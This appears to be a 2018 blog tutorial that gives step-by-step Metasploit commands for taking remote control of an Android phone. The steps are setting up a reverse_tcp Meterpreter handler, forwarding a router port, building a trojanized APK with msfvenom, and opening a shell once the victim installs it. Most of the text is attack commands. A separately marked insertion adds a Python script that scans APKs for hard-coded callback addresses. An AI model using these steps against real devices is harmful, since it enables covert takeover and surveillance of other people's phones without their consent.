How to Gain Remote Access To an Android with Metasploit (Public IP)

by hash3liZer . 12 April 2018


Use of the Android platform has increased significantly over the last decade, so it is worth discussing how well it has held up, security-wise, against trojans and today's most aggressive malware.

Just as Windows can be compromised if the necessary precautions are not taken, the same is true of Android. Over the years various practices have been used to circumvent the security policies of the Android platform, Metasploit being one of them.

Metasploit

Metasploit is an exceptionally powerful tool written in Ruby that is quite handy as a secondary command-line interface. It provides access to diverse modules, each with an intended task to perform, further categorized into sub-modules.

Metasploit is popular among researchers because of its handy interface and the large database of exploits it offers.

Every day or week, when a new severe vulnerability is discovered, the Metasploit developers publish it publicly on the ExploitDB platform. Read more about gaining access to multiple platforms with shellpop:

Setup a remote Backdoor on Windows/Linux for system access.

Anti-virus software and firewalls are well acquainted with Metasploit payload signatures and with how it obfuscates the payload used to gain backdoor access.

So the AV detects the virus and removes it instead of letting it execute, making it a strong guard against Metasploit.

Let's see how we can gain access to an android smartphone with metasploit:

STEP 1

Preparing Metasploit

Open the console (terminal). Check for the weekly updates and apply them to Metasploit if necessary or if new modules are available. Doing so keeps you informed of newly added modules and exploits.

apt install metasploit-framework

After that, start the PostgreSQL database service. Metasploit uses PostgreSQL as its storage database. This lets us quickly navigate and search Metasploit modules, avoiding the slow module search that wastes time while the output is being organized.

systemctl enable postgresql
systemctl start postgresql

Enabling PostgreSQL starts it every time the system boots, so there is no need to repeat this step the next time Metasploit is launched.

Type msfconsole in the terminal and press [Enter]. It takes a few seconds to bring the interface up to a fully functional state.

msfconsole


STEP 2

Choose the exploit

Search for an appropriate exploit for the target OS using the search command. Our target is an Android smartphone, so the query for Android could be:

search type:exploit platform:android

It lists the exploits available for the Android platform. You can get help on Metasploit commands by typing help followed by a space and the command name, such as help search, which prints the manual for the search command. Here is the output of the Android exploit search:

[Image: output of the Android exploit search]

From the list of exploits shown in the image, we will use the generic exploit highlighted there. To use the exploit, enter this command:

use exploit/multi/handler


Every exploit comes with a set of payloads. Payloads are the modules that provide the backbone environment for transferring and executing commands on the target. Different payloads are used according to the scenario and how much working space is available on the target. To show the payloads available for an exploit, type:

show payloads


From the set of payloads, we will use android/meterpreter/reverse_tcp. It is a versatile payload to get started with, and it gives us a Meterpreter session if the payload executes undetected. Meterpreter presents a handful of commands that are enough to wholly compromise the target system.

At this point we need to know the basic difference between reverse and bind payloads. A bind payload opens a listening port on the target system that you then connect to, while a reverse payload makes the target connect back to a listener on your machine, making your machine the host.

In short, bind payloads are more useful when the target is a server or a device directly connected to the internet with a static IP. Reverse payloads are more widely adopted because of the way they work.

Because most computers on the internet are behind NAT, a bind payload is unlikely to work in this situation. Set the payload:

set PAYLOAD android/meterpreter/reverse_tcp

STEP 3

Set Options

Get information about the exploit with the info command. This is the key step to understanding how the exploit actually works. It gives you background information such as the possible targets and the core of the vulnerability.

info


At this point we know how the exploit works. Now we set the options for our exploit: LHOST for the attacker's local address and LPORT for the local port to use. To find the local IP address, type:

ip route


So my local IP is 192.168.1.10. Set LHOST and LPORT:

set LHOST 192.168.1.10
set LPORT 777         # Port for establishing connections

Make sure that both parameters have been set correctly.

show options


STEP 4

Run the Exploit

Run the exploit as a job. It executes in the background and notifies you whenever the payload executes on the target system. Afterwards we will use the sessions command to interact with the target session.

exploit -j


STEP 5

IP Forwarding

Find the gateway IP of your network, then navigate to that IP in a web browser and log in. Type:

route -n


Now open a web browser and log in to the router's administrative page.


After logging in, forward port 777 so that the firewall allows the client and attacker machines to send and receive traffic. If you do not know how to forward a port on your router, go to PortForward.com, search for your router's manufacturer and model, and follow the instructions for your router.

STEP 6

Generate (Infected) Application

To generate the infected (payload) application with the .apk extension, we use msfvenom, the native payload generator of the Metasploit framework. Open a new console (terminal) and generate a simple payload application for Android:

msfvenom -p android/meterpreter/reverse_tcp --platform android -o /root/Desktop/application.apk LHOST=Public IP Address (attacker) LPORT=777


PARAMETER BREAKDOWN

  • -p: payload to use
  • --platform: target platform
  • -o: path where the infected file is written
  • LHOST: public IP of the attacker (local) machine
  • LPORT: public port of the attacker (local) machine
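As an added defender-side example that is not part of the original post: a small Python triage script that opens an APK (which is a zip archive) and lists any plain-text IPv4:port pairs embedded in its entries, flagging public addresses on unusual ports such as the 777 used above. The sample APK it builds is constructed here; a real payload APK may store the callback address in compiled code rather than plain text, which this simple scan would miss.

```python
import io
import re
import zipfile

# IPv4:port pairs such as 203.0.113.5:777, also inside URLs like tcp://203.0.113.5:777.
# The lookbehind/lookahead stop matches from starting or ending inside a longer number.
CALLBACK_RE = re.compile(rb"(?<![\d.])((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})(?!\d)")


def find_callback_addresses(apk_bytes):
    """Return (entry_name, ip, port) for every valid plain-text IPv4:port pair
    found in any entry of the APK. Invalid octets or ports are skipped."""
    found = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            data = apk.read(name)
            for m in CALLBACK_RE.finditer(data):
                ip = m.group(1).decode()
                port = int(m.group(2))
                if not 1 <= port <= 65535 or any(int(o) > 255 for o in ip.split(".")):
                    continue
                found.append((name, ip, port))
    return found


def is_suspicious(ip, port, common_ports=(80, 443)):
    """A hard-coded public IP on a non-standard port (e.g. 777) deserves a closer look;
    private/loopback addresses and the usual web ports are treated as benign here."""
    octets = [int(o) for o in ip.split(".")]
    private = (
        octets[0] in (10, 127)
        or (octets[0] == 172 and 16 <= octets[1] <= 31)
        or (octets[0] == 192 and octets[1] == 168)
    )
    return not private and port not in common_ports


def build_sample_apk():
    """Constructed sample (not a real payload): a minimal zip with a manifest-like
    entry and a config string carrying one public and one private endpoint."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<manifest package='com.example.app'/>")
        z.writestr("assets/config.txt",
                   b"endpoint=tcp://203.0.113.5:777 backup=10.0.0.2:8080 ver=1.2.3.4")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, ip, port in find_callback_addresses(build_sample_apk()):
        print(f"{entry}: {ip}:{port} suspicious={is_suspicious(ip, port)}")
```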

STEP 7

Own the target

As soon as the generated apk file is installed on the target Android device, the Metasploit terminal we left open gives us a live target session. List the available sessions:

sessions -l

To interact with a session, type the session identifier (ID) after the sessions command. This takes you to the Meterpreter shell.

sessions [n]      # [n] is the ID of available sessions

sessions 2

A Meterpreter session is launched. Type the help command; it lists a handful of commands, from getting system info to starting a live chat.

meterpreter > help

Ignore the meterpreter > prefix. It is just there to indicate that this is a Meterpreter session.

Let's try the shell command. It brings up the terminal (or cmd, on Windows) of the target system. Try executing a command.

meterpreter > shell


Conclusion

Android is the most widely adopted operating system, making it the most popular platform, decisively leaving Windows behind and at the forefront of security policies. Like other platforms, Android can be compromised with a few considerations in mind, and Metasploit can help with that. However, one must note that Android, compared to Windows, is usually considered more secure and more reliable to depend on.